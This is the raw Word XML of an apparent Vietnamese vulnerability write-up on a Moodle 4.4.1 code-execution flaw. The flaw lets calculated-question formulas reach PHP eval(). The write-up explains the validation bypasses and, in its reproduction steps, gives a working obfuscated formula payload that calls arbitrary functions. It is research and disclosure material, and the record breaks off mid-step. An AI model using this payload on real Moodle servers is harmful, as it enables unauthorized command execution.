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33708" w14:textId="35DBFDE9" w:rsidR="00426A28" w:rsidRPr="006D728D" w:rsidRDefault="00384243" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384243">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Firmware info</w:t>
      </w:r>
      <w:r w:rsidR="006F70E5" w:rsidRPr="006D728D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4121BA" w14:textId="6D84494E" w:rsidR="006F70E5" w:rsidRDefault="006F70E5" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tên ứng dụng: Moodle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E82451" w14:textId="146FB744" w:rsidR="006F70E5" w:rsidRDefault="006F70E5" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Phiên bản xây dựng: moodle-4.4.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B4AE79" w14:textId="2A458B7B" w:rsidR="0078797A" w:rsidRDefault="0078797A" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0078797A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Các phiên bản bị ảnh hưởng: 4.4 đến 4.4.1, 4.3 đến 4.3.5, 4.2 đến 4.2.8, 4.1 đến 4.1.11 và các phiên bản không được hỗ trợ trước đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3743EAFF" w14:textId="5ACEC485" w:rsidR="001117B8" w:rsidRDefault="001117B8" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Liên kết tải xuống: </w:t>
      </w:r>
      <w:r w:rsidRPr="001117B8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://sourceforge.net/projects/moodle/files/Moodle/stable404/moodle-4.4.1.zip/download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FAE769" w14:textId="4EDF9B80" w:rsidR="006F70E5" w:rsidRPr="006D728D" w:rsidRDefault="00384243" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384243">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Description and Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2825AFD2" w14:textId="68E4AC69" w:rsidR="006D728D" w:rsidRDefault="006D728D" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D728D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Những kẻ tấn công có quyền tạo hoặc sửa đổi câu hỏi trong khóa học Moodle có thể tạo ra dữ liệu đầu vào độc hại cho các câu hỏi được tính toán, có thể bị lạm dụng để thực thi các lệnh tùy ý trên hệ thống cơ bản</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A97C467" w14:textId="6AC7483D" w:rsidR="006D728D" w:rsidRPr="006D728D" w:rsidRDefault="00384243" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384243">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Root-casue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B131E54" w14:textId="3D17B08F" w:rsidR="00452D0D" w:rsidRDefault="00362FCA" w:rsidP="00452D0D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE6D9A9" wp14:editId="15E51B88">
            <wp:extent cx="5943600" cy="1407160"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="98977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3849" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1407160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3856A" w14:textId="65E78BD2" w:rsidR="00AC65D8" w:rsidRDefault="00452D0D" w:rsidP="00452D0D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D728D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hàm qtype_calculated_find_formula_errors giúp đảm bảo tính hợp lệ của các công thức được nhập vào trong Moodle, ngăn chặn các lỗi cú pháp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C297DF7" w14:textId="1ED24213" w:rsidR="00452D0D" w:rsidRDefault="00452D0D" w:rsidP="00452D0D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="033DA879" wp14:editId="79E84508">
            <wp:extent cx="5943600" cy="2882265"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="85239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90815" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2882265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B8B1B" w14:textId="5E34C22D" w:rsidR="006D728D" w:rsidRDefault="00452D0D" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D728D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="006D728D" w:rsidRPr="006D728D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ác biến được thay thế bằng số 1.0</w:t>
      </w:r>
      <w:r w:rsidR="006D728D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006D728D" w:rsidRPr="006D728D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>công thức được chuyển đổi thành chữ thường và xóa khoảng trắng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391249E9" w14:textId="77777777" w:rsidR="00362FCA" w:rsidRDefault="00362FCA" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A365BAE" w14:textId="6F96398A" w:rsidR="00362FCA" w:rsidRDefault="00362FCA" w:rsidP="00AE3722">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00362FCA">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DBE1F54" wp14:editId="09BD74C9">
            <wp:extent cx="5943600" cy="4347210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="211732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20496" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4347210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00362FCA">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="712A570B" wp14:editId="6A2FD1DF">
            <wp:extent cx="5943600" cy="2585720"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="153720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01687" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2585720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="111EB71D" w14:textId="6CDB958D" w:rsidR="0068793F" w:rsidRDefault="0068793F" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068793F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Logic xác thực chính được thực hiện bằng cách lặp qua công thức và xác định biểu thức toán học trong cùng bên trái, có thể phân biệt bằng cách thiếu dấu ngoặc đơn lồng nhau. Sau đó, biểu thức này được thay thế bằng a 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E60798" w14:textId="77777777" w:rsidR="00362FCA" w:rsidRDefault="00362FCA" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73AC8ABD" w14:textId="5F294ED6" w:rsidR="00362FCA" w:rsidRDefault="00362FCA" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00362FCA">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EC2616D" wp14:editId="0B74582C">
            <wp:extent cx="5943600" cy="1186815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="115233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33360" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1186815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="447987E2" w14:textId="76DA2788" w:rsidR="0068793F" w:rsidRDefault="0068793F" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="0068793F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uối cùng, sau khi biểu thức chính quy không trả về kết quả khớp bổ sung nào, công thức được coi là hợp lệ nếu nó chỉ chứa các toán tử hoặc số an toàn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0068793F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Công thức ban đầu chỉ được chuyển đến eval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F2E53" w14:textId="5217E1C8" w:rsidR="0078797A" w:rsidRDefault="0068793F" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Việc xác minh kết quả được thực hiện bằng cách truyền công thức đến hàm php eval() sau khi lọc không hoàn tất. Có 2 cách tiếp cận để tránh </w:t>
      </w:r>
      <w:r w:rsidR="0078797A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>quá trình logic xác thực</w:t>
      </w:r>
      <w:r w:rsidR="001117B8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603E783" w14:textId="73F4EB1F" w:rsidR="0078797A" w:rsidRPr="00AE3722" w:rsidRDefault="0078797A" w:rsidP="00AE3722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="90" w:firstLine="630"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE3722">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Danh sách các hàm toán học được phép rõ ràng có thể được sử dụng để xây dựng các tên hàm tùy ý dưới dạng chuỗi bằng các phép toán từng bit, có thể được gọi là các hàm biến khi theo sau là dấu ngoặc đơn. Cách duy nhất được xác định để thêm dấu ngoặc đơn bắt buộc là sử dụng phép thay thế biến tích hợp, do đó cho phép kẻ tấn công gọi các hàm tùy ý được xác định trong ngữ cảnh Moodle trong khi truyền một đối số số duy nhất. Đầu ra của hàm được tiết lộ cho kẻ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D2FDC3" w14:textId="2656019C" w:rsidR="001117B8" w:rsidRDefault="001117B8" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001117B8">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C88745E" wp14:editId="29E52AEB">
            <wp:extent cx="5744377" cy="1619476"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="157910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3299" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5744377" cy="1619476"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3230C427" w14:textId="225E4499" w:rsidR="00AE3722" w:rsidRPr="001117B8" w:rsidRDefault="00AE3722" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE3722">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Thay thế các trình giữ chỗ biến như {a} bằng giá trị của chúng được gói trong ()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3722">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nếu chúng ta thêm {a}vào biểu thức trên tương ứng với 'PRINTF'kết quả sẽ là 'PRINTF'(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> nên </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3722">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>có thể định nghĩa một công thức trả lời với hai phần: a (function_name)và a {variable}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F0720D" w14:textId="75E0A816" w:rsidR="00FB4CB3" w:rsidRPr="00AE3722" w:rsidRDefault="00FB4CB3" w:rsidP="00AE3722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE3722">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Các biến không xác định không được thay thế trước khi được truyền vào hàm eval(), để chúng không bị ảnh hưởng như một phần của công thức. Ngoài ra, các kiểm tra vệ sinh cho tên biến ít nghiêm ngặt hơn các kiểm tra được triển </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3722">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>khai cho tất cả các phần khác của công thức. Điều này có thể bị lạm dụng để gọi các hàm tùy ý khi sử dụng cú pháp php object-&gt;{"member"}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E0E905" w14:textId="4BE86A88" w:rsidR="00104B87" w:rsidRDefault="00384243" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384243">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Steps to reprocedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC6878" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00404C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tạo một câu hỏi được tính toán với một biến, ví dụ{a}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA08682" w14:textId="77777777" w:rsidR="00104B87" w:rsidRPr="00901423" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>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7E7B21F9" wp14:editId="54D34531">
            <wp:extent cx="5943600" cy="3094355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="673728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p>
    <w:p w14:paraId="1A4FB753" w14:textId="77777777" w:rsidR="009873F8" w:rsidRDefault="009873F8" w:rsidP="009873F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB16FD6" w14:textId="54429B61" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="009873F8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00404C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lưu câu hỏi và xác định phạm vi giá trị của biến chính xác là ID của khóa học</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> là 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451C3836" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>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48124CD4" wp14:editId="011A4DAA">
            <wp:extent cx="5943600" cy="2887980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="44164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66A556CB" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00404C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lưu câu hỏi, sau đó chỉnh sửa lại</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> biểu thức thành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFF8827" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00404C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>((acos(2) . 0+acos(2) . 0+acos(2) . 0+acos(2) . 0+acos(2)) ^ (8 . 4 . 2 . 8 . 8 . 3 . 4 . 0 . 0 . 0 . -1 . 3) ^ (2 . 0 . 0 . 3 . 0 . 0 . 0 . 0 . 0 . -8 . 1 . 0) ^ (0 . 0 . 0 . 0 . 0 . 0 . -2 . 1 . 4 . 6 . 0 . 0) ^ (0 . 0 . 0 . 0 . -8 . 8 . 0 . 0 . 2 . 0 . -8)){a}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACBF9C4" w14:textId="7F38B1E2" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="009873F8">
      <w:pPr>
        <w:ind w:firstLine="720"/>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692234C4" wp14:editId="604F4461">
            <wp:extent cx="5943600" cy="3027045"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="396766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14:paraId="7B293070" w14:textId="4999D852" w:rsidR="00104B87" w:rsidRPr="00901423" w:rsidRDefault="00FB4CB3" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB4CB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lưu câu hỏi đã sửa đổi sẽ dẫn đến lỗi, nhưng câu hỏi vẫn sẽ được lưu. Quay lại ngân hàng câu hỏi và xem trước câu hỏi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4CB3">
        <w:rPr>
